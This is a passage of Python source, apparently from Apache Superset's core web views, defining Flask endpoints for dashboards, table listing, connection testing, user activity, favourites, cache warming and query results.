status=403,
)
dash = Dashboard(
dashboard_title=request.args.get("new_dashboard_name"),
owners=[g.user] if g.user else [],
)
flash(
_(
"Dashboard [{}] just got created and chart [{}] was added " "to it"
).format(dash.dashboard_title, slc.slice_name),
"success",
)
if dash and slc not in dash.slices:
dash.slices.append(slc)
db.session.commit()
response = {
"can_add": slice_add_perm,
"can_download": slice_download_perm,
"form_data": slc.form_data,
"slice": slc.data,
"dashboard_url": dash.url if dash else None,
"dashboard_id": dash.id if dash else None,
}
if dash and request.args.get("goto_dash") == "true":
response.update({"dashboard": dash.url})
return json_success(json.dumps(response))
@api
@has_access_api
@event_logger.log_this
@expose("/tables/<int:db_id>/<schema>/<substr>/")
@expose("/tables/<int:db_id>/<schema>/<substr>/<force_refresh>/")
@expose("/tables/<int:db_id>/<schema>/<substr>/<force_refresh>/<exact_match>")
def tables( # pylint: disable=too-many-locals,no-self-use,too-many-arguments
self,
db_id: int,
schema: str,
substr: str,
force_refresh: str = "false",
exact_match: str = "false",
) -> FlaskResponse:
"""Endpoint to fetch the list of tables for given database"""
# Guarantees database filtering by security access
query = db.session.query(Database)
query = DatabaseFilter("id", SQLAInterface(Database, db.session)).apply(
query, None
)
database = query.filter_by(id=db_id).one_or_none()
if not database:
return json_error_response("Not found", 404)
force_refresh_parsed = force_refresh.lower() == "true"
exact_match_parsed = exact_match.lower() == "true"
schema_parsed = utils.parse_js_uri_path_item(schema, eval_undefined=True)
substr_parsed = utils.parse_js_uri_path_item(substr, eval_undefined=True)
if schema_parsed:
tables = [
utils.DatasourceName(*datasource_name)
for datasource_name in database.get_all_table_names_in_schema(
schema=schema_parsed,
force=force_refresh_parsed,
cache=database.table_cache_enabled,
cache_timeout=database.table_cache_timeout,
)
] or []
views = [
utils.DatasourceName(*datasource_name)
for datasource_name in database.get_all_view_names_in_schema(
schema=schema_parsed,
force=force_refresh_parsed,
cache=database.table_cache_enabled,
cache_timeout=database.table_cache_timeout,
)
] or []
else:
tables = [
utils.DatasourceName(*datasource_name)
for datasource_name in database.get_all_table_names_in_database(
cache=True, force=False, cache_timeout=24 * 60 * 60
)
]
views = [
utils.DatasourceName(*datasource_name)
for datasource_name in database.get_all_view_names_in_database(
cache=True, force=False, cache_timeout=24 * 60 * 60
)
]
tables = security_manager.get_datasources_accessible_by_user(
database, tables, schema_parsed
)
views = security_manager.get_datasources_accessible_by_user(
database, views, schema_parsed
)
def get_datasource_label(ds_name: utils.DatasourceName) -> str:
return (
ds_name.table if schema_parsed else f"{ds_name.schema}.{ds_name.table}"
)
def is_match(src: str, target: utils.DatasourceName) -> bool:
target_label = get_datasource_label(target)
if exact_match_parsed:
return src == target_label
return src in target_label
if substr_parsed:
tables = [tn for tn in tables if is_match(substr_parsed, tn)]
views = [vn for vn in views if is_match(substr_parsed, vn)]
if not schema_parsed and database.default_schemas:
user_schemas = (
[g.user.email.split("@")[0]] if hasattr(g.user, "email") else []
)
valid_schemas = set(database.default_schemas + user_schemas)
tables = [tn for tn in tables if tn.schema in valid_schemas]
views = [vn for vn in views if vn.schema in valid_schemas]
max_items = config["MAX_TABLE_NAMES"] or len(tables)
total_items = len(tables) + len(views)
max_tables = len(tables)
max_views = len(views)
if total_items and substr_parsed:
max_tables = max_items * len(tables) // total_items
max_views = max_items * len(views) // total_items
dataset_tables = {table.name: table for table in database.tables}
table_options = [
{
"value": tn.table,
"schema": tn.schema,
"label": get_datasource_label(tn),
"title": get_datasource_label(tn),
"type": "table",
"extra": dataset_tables[f"{tn.schema}.{tn.table}"].extra_dict
if (f"{tn.schema}.{tn.table}" in dataset_tables)
else None,
}
for tn in tables[:max_tables]
]
table_options.extend(
[
{
"value": vn.table,
"schema": vn.schema,
"label": get_datasource_label(vn),
"title": get_datasource_label(vn),
"type": "view",
}
for vn in views[:max_views]
]
)
table_options.sort(key=lambda value: value["label"])
payload = {"tableLength": len(tables) + len(views), "options": table_options}
return json_success(json.dumps(payload))
@api
@has_access_api
@event_logger.log_this
@expose("/copy_dash/<int:dashboard_id>/", methods=["GET", "POST"])
def copy_dash( # pylint: disable=no-self-use
self, dashboard_id: int
) -> FlaskResponse:
"""Copy dashboard"""
session = db.session()
data = json.loads(request.form["data"])
        # The client sends back last_modified_time, which was set when the
        # dashboard was opened; it is used to detect mid-air collisions.
        # Remove it here to avoid confusion.
data.pop("last_modified_time", None)
dash = Dashboard()
original_dash = session.query(Dashboard).get(dashboard_id)
dash.owners = [g.user] if g.user else []
dash.dashboard_title = data["dashboard_title"]
old_to_new_slice_ids: Dict[int, int] = {}
if data["duplicate_slices"]:
# Duplicating slices as well, mapping old ids to new ones
for slc in original_dash.slices:
new_slice = slc.clone()
new_slice.owners = [g.user] if g.user else []
session.add(new_slice)
session.flush()
new_slice.dashboards.append(dash)
old_to_new_slice_ids[slc.id] = new_slice.id
# update chartId of layout entities
for value in data["positions"].values():
if isinstance(value, dict) and value.get("meta", {}).get("chartId"):
old_id = value["meta"]["chartId"]
new_id = old_to_new_slice_ids.get(old_id)
value["meta"]["chartId"] = new_id
else:
dash.slices = original_dash.slices
dash.params = original_dash.params
DashboardDAO.set_dash_metadata(dash, data, old_to_new_slice_ids)
session.add(dash)
session.commit()
dash_json = json.dumps(dash.data)
session.close()
return json_success(dash_json)
@api
@has_access_api
@event_logger.log_this
@expose("/save_dash/<int:dashboard_id>/", methods=["GET", "POST"])
def save_dash( # pylint: disable=no-self-use
self, dashboard_id: int
) -> FlaskResponse:
"""Save a dashboard's metadata"""
session = db.session()
dash = session.query(Dashboard).get(dashboard_id)
check_ownership(dash, raise_if_false=True)
data = json.loads(request.form["data"])
        # The client sends back last_modified_time, which was set when the
        # dashboard was opened; it is used to detect mid-air collisions.
remote_last_modified_time = data.get("last_modified_time")
current_last_modified_time = dash.changed_on.replace(microsecond=0).timestamp()
if (
remote_last_modified_time
and remote_last_modified_time < current_last_modified_time
):
return json_error_response(
__(
"This dashboard was changed recently. "
"Please reload dashboard to get latest version."
),
412,
)
        # remove it to avoid confusion.
data.pop("last_modified_time", None)
DashboardDAO.set_dash_metadata(dash, data)
session.merge(dash)
session.commit()
# get updated changed_on
dash = session.query(Dashboard).get(dashboard_id)
last_modified_time = dash.changed_on.replace(microsecond=0).timestamp()
session.close()
return json_success(
json.dumps({"status": "SUCCESS", "last_modified_time": last_modified_time})
)
@api
@has_access_api
@event_logger.log_this
@expose("/add_slices/<int:dashboard_id>/", methods=["POST"])
def add_slices( # pylint: disable=no-self-use
self, dashboard_id: int
) -> FlaskResponse:
"""Add and save slices to a dashboard"""
data = json.loads(request.form["data"])
session = db.session()
dash = session.query(Dashboard).get(dashboard_id)
check_ownership(dash, raise_if_false=True)
new_slices = session.query(Slice).filter(Slice.id.in_(data["slice_ids"]))
dash.slices += new_slices
session.merge(dash)
session.commit()
session.close()
return "SLICES ADDED"
@api
@has_access_api
@event_logger.log_this
@expose("/testconn", methods=["POST", "GET"])
def testconn(self) -> FlaskResponse:
"""Tests a sqla connection"""
logger.warning(
"%s.testconn "
"This API endpoint is deprecated and will be removed in version 3.0.0",
self.__class__.__name__,
)
db_name = request.json.get("name")
uri = request.json.get("uri")
try:
if app.config["PREVENT_UNSAFE_DB_CONNECTIONS"]:
check_sqlalchemy_uri(make_url_safe(uri))
            # If the database already exists, only its safe (password-masked) URI
            # is shown in the UI and passed back in the form data. So if the form
            # was submitted with the safe URI, retrieve the decrypted URI to test
            # the connection.
if db_name:
existing_database = (
db.session.query(Database)
.filter_by(database_name=db_name)
.one_or_none()
)
if existing_database and uri == existing_database.safe_sqlalchemy_uri():
uri = existing_database.sqlalchemy_uri_decrypted
# This is the database instance that will be tested. Note the extra fields
# are represented as JSON encoded strings in the model.
database = Database(
server_cert=request.json.get("server_cert"),
extra=json.dumps(request.json.get("extra", {})),
impersonate_user=request.json.get("impersonate_user"),
encrypted_extra=json.dumps(request.json.get("encrypted_extra", {})),
)
database.set_sqlalchemy_uri(uri)
database.db_engine_spec.mutate_db_for_connection_test(database)
engine = database.get_sqla_engine()
with closing(engine.raw_connection()) as conn:
if engine.dialect.do_ping(conn):
return json_success('"OK"')
raise DBAPIError(None, None, None)
except CertificateException as ex:
logger.info("Certificate exception")
return json_error_response(ex.message)
except (NoSuchModuleError, ModuleNotFoundError):
logger.info("Invalid driver")
driver_name = make_url_safe(uri).drivername
return json_error_response(
_(
"Could not load database driver: %(driver_name)s",
driver_name=driver_name,
),
400,
)
except DatabaseInvalidError:
logger.info("Invalid URI")
return json_error_response(
_(
"Invalid connection string, a valid string usually follows:\n"
"'DRIVER://USER:PASSWORD@DB-HOST/DATABASE-NAME'"
)
)
except DBAPIError:
logger.warning("Connection failed")
return json_error_response(
_("Connection failed, please check your connection settings"), 400
)
except SupersetSecurityException as ex:
logger.warning("Stopped an unsafe database connection")
return json_error_response(_(str(ex)), 400)
except Exception as ex: # pylint: disable=broad-except
logger.warning("Unexpected error %s", type(ex).__name__)
return json_error_response(
_("Unexpected error occurred, please check your logs for details"), 400
)
@staticmethod
def get_user_activity_access_error(user_id: int) -> Optional[FlaskResponse]:
try:
security_manager.raise_for_user_activity_access(user_id)
except SupersetSecurityException as ex:
return json_error_response(
ex.message,
status=403,
)
return None
@api
@has_access_api
@event_logger.log_this
@expose("/recent_activity/<int:user_id>/", methods=["GET"])
def recent_activity( # pylint: disable=too-many-locals
self, user_id: int
) -> FlaskResponse:
"""Recent activity (actions) for a given user"""
error_obj = self.get_user_activity_access_error(user_id)
if error_obj:
return error_obj
limit = request.args.get("limit")
limit = int(limit) if limit and limit.isdigit() else 100
actions = request.args.get("actions", "explore,dashboard").split(",")
# whether to get distinct subjects
distinct = request.args.get("distinct") != "false"
        has_subject_title = or_(
            and_(
                Dashboard.dashboard_title.isnot(None),
                Dashboard.dashboard_title != "",
            ),
            and_(Slice.slice_name.isnot(None), Slice.slice_name != ""),
        )
if distinct:
one_year_ago = datetime.today() - timedelta(days=365)
subqry = (
db.session.query(
Log.dashboard_id,
Log.slice_id,
Log.action,
func.max(Log.dttm).label("dttm"),
)
.group_by(Log.dashboard_id, Log.slice_id, Log.action)
.filter(
and_(
Log.action.in_(actions),
Log.user_id == user_id,
# limit to one year of data to improve performance
Log.dttm > one_year_ago,
or_(Log.dashboard_id.isnot(None), Log.slice_id.isnot(None)),
)
)
.subquery()
)
qry = (
db.session.query(
subqry,
Dashboard.slug.label("dashboard_slug"),
Dashboard.dashboard_title,
Slice.slice_name,
)
.outerjoin(Dashboard, Dashboard.id == subqry.c.dashboard_id)
.outerjoin(
Slice,
Slice.id == subqry.c.slice_id,
)
.filter(has_subject_title)
.order_by(subqry.c.dttm.desc())
.limit(limit)
)
else:
qry = (
db.session.query(
Log.dttm,
Log.action,
Log.dashboard_id,
Log.slice_id,
Dashboard.slug.label("dashboard_slug"),
Dashboard.dashboard_title,
Slice.slice_name,
)
.outerjoin(Dashboard, Dashboard.id == Log.dashboard_id)
.outerjoin(Slice, Slice.id == Log.slice_id)
.filter(has_subject_title)
.order_by(Log.dttm.desc())
.limit(limit)
)
payload = []
for log in qry.all():
item_url = None
item_title = None
item_type = None
if log.dashboard_id:
item_type = "dashboard"
item_url = Dashboard(id=log.dashboard_id, slug=log.dashboard_slug).url
item_title = log.dashboard_title
elif log.slice_id:
slc = Slice(id=log.slice_id, slice_name=log.slice_name)
item_type = "slice"
item_url = slc.slice_url
item_title = slc.chart
payload.append(
{
"action": log.action,
"item_type": item_type,
"item_url": item_url,
"item_title": item_title,
"time": log.dttm,
"time_delta_humanized": humanize.naturaltime(
datetime.now() - log.dttm
),
}
)
return json_success(json.dumps(payload, default=utils.json_int_dttm_ser))
@api
@has_access_api
@event_logger.log_this
@expose("/available_domains/", methods=["GET"])
def available_domains(self) -> FlaskResponse: # pylint: disable=no-self-use
"""
Returns the list of available Superset Webserver domains (if any)
defined in config. This enables charts embedded in other apps to
leverage domain sharding if appropriately configured.
"""
return Response(
json.dumps(conf.get("SUPERSET_WEBSERVER_DOMAINS")), mimetype="text/json"
)
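    # Illustrative note (not part of the original file): domain sharding is
    # driven purely by config, e.g. a hypothetical superset_config.py entry
    #
    #   SUPERSET_WEBSERVER_DOMAINS = [
    #       "shard1.superset.example.com",
    #       "shard2.superset.example.com",
    #   ]
    #
    # would make a GET to /superset/available_domains/ return that list as JSON.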
@api
@has_access_api
@event_logger.log_this
@expose("/fave_dashboards_by_username/<username>/", methods=["GET"])
def fave_dashboards_by_username(self, username: str) -> FlaskResponse:
"""This lets us use a user's username to pull favourite dashboards"""
logger.warning(
"%s.fave_dashboards_by_username "
"This API endpoint is deprecated and will be removed in version 3.0.0",
self.__class__.__name__,
)
user = security_manager.find_user(username=username)
return self.fave_dashboards(user.id)
@api
@has_access_api
@event_logger.log_this
@expose("/fave_dashboards/<int:user_id>/", methods=["GET"])
def fave_dashboards(self, user_id: int) -> FlaskResponse:
logger.warning(
"%s.fave_dashboards "
"This API endpoint is deprecated and will be removed in version 3.0.0",
self.__class__.__name__,
)
error_obj = self.get_user_activity_access_error(user_id)
if error_obj:
return error_obj
qry = (
db.session.query(Dashboard, FavStar.dttm)
.join(
FavStar,
and_(
FavStar.user_id == int(user_id),
FavStar.class_name == "Dashboard",
Dashboard.id == FavStar.obj_id,
),
)
.order_by(FavStar.dttm.desc())
)
payload = []
for o in qry.all():
dash = {
"id": o.Dashboard.id,
"dashboard": o.Dashboard.dashboard_link(),
"title": o.Dashboard.dashboard_title,
"url": o.Dashboard.url,
"dttm": o.dttm,
}
if o.Dashboard.created_by:
user = o.Dashboard.created_by
dash["creator"] = str(user)
dash["creator_url"] = "/superset/profile/{}/".format(user.username)
payload.append(dash)
return json_success(json.dumps(payload, default=utils.json_int_dttm_ser))
@api
@has_access_api
@event_logger.log_this
@expose("/created_dashboards/<int:user_id>/", methods=["GET"])
def created_dashboards(self, user_id: int) -> FlaskResponse:
logger.warning(
"%s.created_dashboards "
"This API endpoint is deprecated and will be removed in version 3.0.0",
self.__class__.__name__,
)
error_obj = self.get_user_activity_access_error(user_id)
if error_obj:
return error_obj
qry = (
db.session.query(Dashboard)
.filter( # pylint: disable=comparison-with-callable
or_(
Dashboard.created_by_fk == user_id,
Dashboard.changed_by_fk == user_id,
)
)
.order_by(Dashboard.changed_on.desc())
)
payload = [
{
"id": o.id,
"dashboard": o.dashboard_link(),
"title": o.dashboard_title,
"url": o.url,
"dttm": o.changed_on,
}
for o in qry.all()
]
return json_success(json.dumps(payload, default=utils.json_int_dttm_ser))
@api
@has_access_api
@event_logger.log_this
@expose("/user_slices", methods=["GET"])
@expose("/user_slices/<int:user_id>/", methods=["GET"])
def user_slices(self, user_id: Optional[int] = None) -> FlaskResponse:
"""List of slices a user owns, created, modified or faved"""
if not user_id:
user_id = cast(int, g.user.id)
error_obj = self.get_user_activity_access_error(user_id)
if error_obj:
return error_obj
owner_ids_query = (
db.session.query(Slice.id)
.join(Slice.owners)
.filter(security_manager.user_model.id == user_id)
)
qry = (
db.session.query(Slice, FavStar.dttm)
.join(
FavStar,
and_(
FavStar.user_id == user_id,
FavStar.class_name == "slice",
Slice.id == FavStar.obj_id,
),
isouter=True,
)
.filter( # pylint: disable=comparison-with-callable
or_(
Slice.id.in_(owner_ids_query),
Slice.created_by_fk == user_id,
Slice.changed_by_fk == user_id,
FavStar.user_id == user_id,
)
)
.order_by(Slice.slice_name.asc())
)
payload = [
{
"id": o.Slice.id,
"title": o.Slice.slice_name,
"url": o.Slice.slice_url,
"data": o.Slice.form_data,
"dttm": o.dttm if o.dttm else o.Slice.changed_on,
"viz_type": o.Slice.viz_type,
}
for o in qry.all()
]
return json_success(json.dumps(payload, default=utils.json_int_dttm_ser))
@api
@has_access_api
@event_logger.log_this
@expose("/created_slices", methods=["GET"])
@expose("/created_slices/<int:user_id>/", methods=["GET"])
def created_slices(self, user_id: Optional[int] = None) -> FlaskResponse:
"""List of slices created by this user"""
if not user_id:
user_id = cast(int, g.user.id)
error_obj = self.get_user_activity_access_error(user_id)
if error_obj:
return error_obj
qry = (
db.session.query(Slice)
.filter( # pylint: disable=comparison-with-callable
or_(Slice.created_by_fk == user_id, Slice.changed_by_fk == user_id)
)
.order_by(Slice.changed_on.desc())
)
payload = [
{
"id": o.id,
"title": o.slice_name,
"url": o.slice_url,
"dttm": o.changed_on,
"viz_type": o.viz_type,
}
for o in qry.all()
]
return json_success(json.dumps(payload, default=utils.json_int_dttm_ser))
@api
@has_access_api
@event_logger.log_this
@expose("/fave_slices", methods=["GET"])
@expose("/fave_slices/<int:user_id>/", methods=["GET"])
def fave_slices(self, user_id: Optional[int] = None) -> FlaskResponse:
"""Favorite slices for a user"""
if user_id is None:
user_id = g.user.id
error_obj = self.get_user_activity_access_error(user_id)
if error_obj:
return error_obj
qry = (
db.session.query(Slice, FavStar.dttm)
.join(
FavStar,
and_(
FavStar.user_id == user_id,
FavStar.class_name == "slice",
Slice.id == FavStar.obj_id,
),
)
.order_by(FavStar.dttm.desc())
)
payload = []
for o in qry.all():
dash = {
"id": o.Slice.id,
"title": o.Slice.slice_name,
"url": o.Slice.slice_url,
"dttm": o.dttm,
"viz_type": o.Slice.viz_type,
}
if o.Slice.created_by:
user = o.Slice.created_by
dash["creator"] = str(user)
dash["creator_url"] = "/superset/profile/{}/".format(user.username)
payload.append(dash)
return json_success(json.dumps(payload, default=utils.json_int_dttm_ser))
@event_logger.log_this
@api
@has_access_api
@expose("/warm_up_cache/", methods=["GET"])
def warm_up_cache( # pylint: disable=too-many-locals,no-self-use
self,
) -> FlaskResponse:
"""Warms up the cache for the slice or table.
Note for slices a force refresh occurs.
In terms of the `extra_filters` these can be obtained from records in the JSON
encoded `logs.json` column associated with the `explore_json` action.
"""
session = db.session()
slice_id = request.args.get("slice_id")
dashboard_id = request.args.get("dashboard_id")
table_name = request.args.get("table_name")
db_name = request.args.get("db_name")
extra_filters = request.args.get("extra_filters")
slices: List[Slice] = []
if not slice_id and not (table_name and db_name):
return json_error_response(
__(
"Malformed request. slice_id or table_name and db_name "
"arguments are expected"
),
status=400,
)
if slice_id:
slices = session.query(Slice).filter_by(id=slice_id).all()
if not slices:
return json_error_response(
__("Chart %(id)s not found", id=slice_id), status=404
)
elif table_name and db_name:
table = (
session.query(SqlaTable)
.join(Database)
.filter(
                    and_(
                        Database.database_name == db_name,
                        SqlaTable.table_name == table_name,
                    )
)
).one_or_none()
if not table:
return json_error_response(
__(
"Table %(table)s wasn't found in the database %(db)s",
table=table_name,
db=db_name,
),
status=404,
)
slices = (
session.query(Slice)
.filter_by(datasource_id=table.id, datasource_type=table.type)
.all()
)
result = []
for slc in slices:
try:
form_data = get_form_data(slc.id, use_slice_data=True)[0]
if dashboard_id:
form_data["extra_filters"] = (
json.loads(extra_filters)
if extra_filters
else get_dashboard_extra_filters(slc.id, dashboard_id)
)
if not slc.datasource:
raise Exception("Slice's datasource does not exist")
obj = get_viz(
datasource_type=slc.datasource.type,
datasource_id=slc.datasource.id,
form_data=form_data,
force=True,
)
# pylint: disable=assigning-non-slot
g.form_data = form_data
payload = obj.get_payload()
delattr(g, "form_data")
error = payload["errors"] or None
status = payload["status"]
except Exception as ex: # pylint: disable=broad-except
error = utils.error_msg_from_exception(ex)
status = None
result.append(
{"slice_id": slc.id, "viz_error": error, "viz_status": status}
)
return json_success(json.dumps(result))
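    # Illustrative usage sketch (assumption, not part of the original file):
    # warming the cache for one chart from a script, assuming an authenticated
    # requests.Session is already available as `session` and the ids are
    # hypothetical.
    #
    #   resp = session.get(
    #       "https://superset.example.com/superset/warm_up_cache/",
    #       params={"slice_id": 42, "dashboard_id": 7},
    #   )
    #   # resp.json() -> [{"slice_id": 42, "viz_error": None, "viz_status": "success"}]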
@has_access_api
@event_logger.log_this
@expose("/favstar/<class_name>/<int:obj_id>/<action>/")
def favstar( # pylint: disable=no-self-use
self, class_name: str, obj_id: int, action: str
) -> FlaskResponse:
"""Toggle favorite stars on Slices and Dashboard"""
if not g.user.get_id():
return json_error_response("ERROR: Favstar toggling denied", status=403)
session = db.session()
count = 0
favs = (
session.query(FavStar)
.filter_by(class_name=class_name, obj_id=obj_id, user_id=g.user.get_id())
.all()
)
if action == "select":
if not favs:
session.add(
FavStar(
class_name=class_name,
obj_id=obj_id,
user_id=g.user.get_id(),
dttm=datetime.now(),
)
)
count = 1
elif action == "unselect":
for fav in favs:
session.delete(fav)
else:
count = len(favs)
session.commit()
return json_success(json.dumps({"count": count}))
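    # Illustrative sketch (assumption): toggling the favorite star on slice 42
    # with an authenticated session; the action segment is "select" or
    # "unselect", mirroring the branches above.
    #
    #   session.get("https://superset.example.com/superset/favstar/slice/42/select/")
    #   # -> {"count": 1}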
@has_access
@expose("/dashboard/<dashboard_id_or_slug>/")
@event_logger.log_this_with_extra_payload
@check_dashboard_access(
on_error=lambda self, ex: Response(
utils.error_msg_from_exception(ex), status=403
)
)
def dashboard(
self,
dashboard_id_or_slug: str, # pylint: disable=unused-argument
add_extra_log_payload: Callable[..., None] = lambda **kwargs: None,
dashboard: Optional[Dashboard] = None,
) -> FlaskResponse:
"""
Server side rendering for a dashboard
:param dashboard_id_or_slug: identifier for dashboard. used in the decorators
        :param add_extra_log_payload: added by `log_this_with_extra_payload`, set a
default value to appease pylint
:param dashboard: added by `check_dashboard_access`
"""
if not dashboard:
abort(404)
if config["ENABLE_ACCESS_REQUEST"]:
for datasource in dashboard.datasources:
datasource = DatasourceDAO.get_datasource(
datasource_type=DatasourceType(datasource.type),
datasource_id=datasource.id,
session=db.session(),
)
if datasource and not security_manager.can_access_datasource(
datasource=datasource
):
flash(
__(
security_manager.get_datasource_access_error_msg(datasource)
),
"danger",
)
return redirect(
f"/superset/request_access/?dashboard_id={dashboard.id}"
)
dash_edit_perm = check_ownership(
dashboard, raise_if_false=False
) and security_manager.can_access("can_save_dash", "Superset")
edit_mode = (
request.args.get(utils.ReservedUrlParameters.EDIT_MODE.value) == "true"
)
standalone_mode = ReservedUrlParameters.is_standalone_mode()
add_extra_log_payload(
dashboard_id=dashboard.id,
dashboard_version="v2",
dash_edit_perm=dash_edit_perm,
edit_mode=edit_mode,
)
bootstrap_data = {
"user": bootstrap_user_data(g.user, include_perms=True),
"common": common_bootstrap_payload(),
}
return self.render_template(
"superset/spa.html",
entry="spa",
bootstrap_data=json.dumps(
bootstrap_data, default=utils.pessimistic_json_iso_dttm_ser
),
standalone_mode=standalone_mode,
)
@has_access
@expose("/dashboard/p/<key>/", methods=["GET"])
def dashboard_permalink( # pylint: disable=no-self-use
self,
key: str,
) -> FlaskResponse:
try:
value = GetDashboardPermalinkCommand(g.user, key).run()
except DashboardPermalinkGetFailedError as ex:
flash(__("Error: %(msg)s", msg=ex.message), "danger")
return redirect("/dashboard/list/")
if not value:
return json_error_response(_("permalink state not found"), status=404)
dashboard_id = value["dashboardId"]
url = f"/superset/dashboard/{dashboard_id}?permalink_key={key}"
url_params = value["state"].get("urlParams")
if url_params:
params = parse.urlencode(url_params)
url = f"{url}&{params}"
hash_ = value["state"].get("hash")
if hash_:
url = f"{url}#{hash_}"
return redirect(url)
@api
@has_access
@event_logger.log_this
@expose("/log/", methods=["POST"])
def log(self) -> FlaskResponse: # pylint: disable=no-self-use
return Response(status=200)
@has_access
@expose("/get_or_create_table/", methods=["POST"])
@event_logger.log_this
def sqllab_table_viz(self) -> FlaskResponse: # pylint: disable=no-self-use
"""Gets or creates a table object with attributes passed to the API.
It expects the json with params:
* datasourceName - e.g. table name, required
* dbId - database id, required
* schema - table schema, optional
* templateParams - params for the Jinja templating syntax, optional
:return: Response
"""
data = json.loads(request.form["data"])
table_name = data["datasourceName"]
database_id = data["dbId"]
table = (
db.session.query(SqlaTable)
.filter_by(database_id=database_id, table_name=table_name)
.one_or_none()
)
if not table:
# Create table if doesn't exist.
with db.session.no_autoflush:
table = SqlaTable(table_name=table_name, owners=[g.user])
table.database_id = database_id
table.database = (
db.session.query(Database).filter_by(id=database_id).one()
)
table.schema = data.get("schema")
table.template_params = data.get("templateParams")
# needed for the table validation.
validate_sqlatable(table)
db.session.add(table)
table.fetch_metadata()
create_table_permissions(table)
db.session.commit()
return json_success(json.dumps({"table_id": table.id}))
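    # Illustrative sketch (assumption): the `data` form field carries a JSON
    # document shaped like the docstring above, with hypothetical values.
    #
    #   data = json.dumps({
    #       "datasourceName": "my_table",
    #       "dbId": 1,
    #       "schema": "public",
    #       "templateParams": None,
    #   })
    #   session.post(".../superset/get_or_create_table/", data={"data": data})
    #   # -> {"table_id": <id of the new or existing table>}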
@has_access
@expose("/sqllab_viz/", methods=["POST"])
@event_logger.log_this
def sqllab_viz(self) -> FlaskResponse: # pylint: disable=no-self-use
data = json.loads(request.form["data"])
try:
table_name = data["datasourceName"]
database_id = data["dbId"]
except KeyError as ex:
raise SupersetGenericErrorException(
                __(
                    "One or more required fields are missing in the request. Please try "
                    "again, and if the problem persists contact your administrator."
),
status=400,
) from ex
database = db.session.query(Database).get(database_id)
if not database:
raise SupersetErrorException(
SupersetError(
message=__("The database was not found."),
error_type=SupersetErrorType.DATABASE_NOT_FOUND_ERROR,
level=ErrorLevel.ERROR,
),
status=404,
)
table = (
db.session.query(SqlaTable)
.filter_by(database_id=database_id, table_name=table_name)
.one_or_none()
)
if not table:
table = SqlaTable(table_name=table_name, owners=[g.user])
table.database = database
table.schema = data.get("schema")
table.template_params = data.get("templateParams")
table.is_sqllab_view = True
table.sql = ParsedQuery(data.get("sql")).stripped()
db.session.add(table)
cols = []
for config_ in data.get("columns"):
column_name = config_.get("name")
col = TableColumn(
column_name=column_name,
filterable=True,
groupby=True,
is_dttm=config_.get("is_dttm", False),
type=config_.get("type", False),
)
cols.append(col)
table.columns = cols
table.metrics = [SqlMetric(metric_name="count", expression="count(*)")]
db.session.commit()
return json_success(json.dumps({"table_id": table.id}))
@has_access
@expose("/extra_table_metadata/<int:database_id>/<table_name>/<schema>/")
@event_logger.log_this
def extra_table_metadata(
self, database_id: int, table_name: str, schema: str
) -> FlaskResponse:
logger.warning(
"%s.extra_table_metadata "
"This API endpoint is deprecated and will be removed in version 3.0.0",
self.__class__.__name__,
)
parsed_schema = utils.parse_js_uri_path_item(schema, eval_undefined=True)
table_name = utils.parse_js_uri_path_item(table_name) # type: ignore
mydb = db.session.query(Database).filter_by(id=database_id).one()
payload = mydb.db_engine_spec.extra_table_metadata(
mydb, table_name, parsed_schema
)
return json_success(json.dumps(payload))
@has_access_api
@expose("/estimate_query_cost/<int:database_id>/", methods=["POST"])
@expose("/estimate_query_cost/<int:database_id>/<schema>/", methods=["POST"])
@event_logger.log_this
def estimate_query_cost( # pylint: disable=no-self-use
self, database_id: int, schema: Optional[str] = None
) -> FlaskResponse:
mydb = db.session.query(Database).get(database_id)
sql = json.loads(request.form.get("sql", '""'))
template_params = json.loads(request.form.get("templateParams") or "{}")
if template_params:
template_processor = get_template_processor(mydb)
sql = template_processor.process_template(sql, **template_params)
timeout = SQLLAB_QUERY_COST_ESTIMATE_TIMEOUT
timeout_msg = f"The estimation exceeded the {timeout} seconds timeout."
try:
with utils.timeout(seconds=timeout, error_message=timeout_msg):
cost = mydb.db_engine_spec.estimate_query_cost(
mydb, schema, sql, utils.QuerySource.SQL_LAB
)
except SupersetTimeoutException as ex:
logger.exception(ex)
return json_errors_response([ex.error])
except Exception as ex: # pylint: disable=broad-except
return json_error_response(utils.error_msg_from_exception(ex))
spec = mydb.db_engine_spec
query_cost_formatters: Dict[str, Any] = app.config[
"QUERY_COST_FORMATTERS_BY_ENGINE"
]
query_cost_formatter = query_cost_formatters.get(
spec.engine, spec.query_cost_formatter
)
cost = query_cost_formatter(cost)
return json_success(json.dumps(cost))
@expose("/theme/")
def theme(self) -> FlaskResponse:
return self.render_template("superset/theme.html")
@has_access_api
@expose("/results/<key>/")
@event_logger.log_this
def results(self, key: str) -> FlaskResponse:
return self.results_exec(key)
@staticmethod
def results_exec(key: str) -> FlaskResponse:
"""Serves a key off of the results backend
It is possible to pass the `rows` query argument to limit the number
of rows returned.
"""
if not results_backend:
raise SupersetErrorException(
SupersetError(
message=__("Results backend is not configured."),
error_type=SupersetErrorType.RESULTS_BACKEND_NOT_CONFIGURED_ERROR,
level=ErrorLevel.ERROR,
)
)
read_from_results_backend_start = now_as_float()
blob = results_backend.get(key)
stats_logger.timing(
"sqllab.query.results_backend_read",
now_as_float() - read_from_results_backend_start,
)
if not blob:
raise SupersetErrorException(
SupersetError(
message=__(
"Data could not be retrieved from the results backend. You "
"need to re-run the original query."
),
error_type=SupersetErrorType.RESULTS_BACKEND_ERROR,
level=ErrorLevel.ERROR,
),
status=410,
)
query = db.session.query(Query).filter_by(results_key=key).one_or_none()
if query is None:
raise SupersetErrorException(
SupersetError(
                    message=__(
                        "The query associated with these results could not be found. "
"You need to re-run the original query."
),
error_type=SupersetErrorType.RESULTS_BACKEND_ERROR,
level=ErrorLevel.ERROR,
),
status=404,
)
try:
query.raise_for_access()
except SupersetSecurityException as ex:
raise SupersetErrorException(
SupersetError(
message=__(
"You are not authorized to see this query. If you think this "
"is an error, please reach out to your administrator."
),
error_type=SupersetErrorType.QUERY_SECURITY_ACCESS_ERROR,
level=ErrorLevel.ERROR,
),
status=403,
) from ex
payload = utils.zlib_decompress(blob, decode=not results_backend_use_msgpack)
try:
obj = _deserialize_results_payload(
payload, query, cast(bool, results_backend_use_msgpack)
)
except SerializationError as ex:
raise SupersetErrorException(
SupersetError(
                    message=__(
                        "Data could not be deserialized from the results backend. The "
                        "storage format might have changed, rendering the old data "
                        "stale. You need to re-run the original query."
),
error_type=SupersetErrorType.RESULTS_BACKEND_ERROR,
level=ErrorLevel.ERROR,
),
status=404,
) from ex
if "rows" in request.args:
try:
rows = int(request.args["rows"])
except ValueError as ex:
raise SupersetErrorException(
SupersetError(
message=__(
